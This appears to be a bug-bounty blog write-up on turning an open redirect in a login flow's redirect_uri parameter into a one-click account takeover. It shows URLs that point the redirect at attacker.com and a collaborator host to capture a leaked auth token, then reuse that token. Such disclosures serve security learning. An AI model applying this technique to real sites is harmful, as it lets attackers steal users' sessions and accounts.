Unveiling the One-Click Account Takeover: It Started with an Innocent Open Redirect

8 months ago 58
BOOK THIS SPACE FOR AD
ARTICLE AD

Hassaan Mohamed

Greetings psycho security voyagers! Today, we embark on a riveting journey into the labyrinth of vulnerabilities, where every little action tells a story of triumph or, in our case, potential catastrophe. Join me as we unravel the mystique behind the One-Click Account Takeover (ATO) via Open Redirect.

NOTE: Again I’m not writing this for beginners so I’ll just hit the details directly.

First thing i did, I proceeded to the sign-up page and created an account. Upon attempting to log in, I observed a 'redirect_uri' parameter within the URL:

https://example.com/authorize?client_type=loginCloud&view_type=web&redirect_uri=https:%2F%2Fexmaple.com%2Fsystems&client_id=cloud_portal&response_type=code&grant_type=password

I decided to alter:

redirect_uri=https:%2F%2Fexmaple.com

To:

redirect_uri=https:%2F%2Fattacker.com

Following my login, I found myself redirected to attacker.com, indicating a typical open redirect. I made a note of this for later.

Several days later, during a conversation with a friend, who happens to be an awesome hacker, I mentioned the open redirect, he said, "Have you attempted an account takeover?" Intrigued, I revisited the process and discovered that the website was disclosing the Auth-Token within the URL post-login!

Armed with this knowledge, I utilized Burp Suite to obtain a collaborator link, which I injected into the open redirect. Subsequently, I awaited the server to transmit the token to my collaborator server, and indeed, it functioned seamlessly. Now, it was time for the Proof of Concept phase.

Server returns Auth-Token to my burpsuite collaborator

I crafted the URL intended to log me into the victim's account, structured as follows:

https://exmaple.com/systems?code=Auth-Token

Regrettably, no discernible action occurred. Nevertheless, we did not embark on this journey to concede defeat, did we?

Returning to my buddy Abdelrhman Amin, he astutely removed the word "systems" from the URL to be:

https://example.com/account?code=Auth-Token

Voilà, IT WORKED!

Shout-Out to my buddy Abdelrhman Amin , and remember always to Collab with your friends to get more ideas because you can always miss something and of course don’t give up on a vulnerability.

Read Entire Article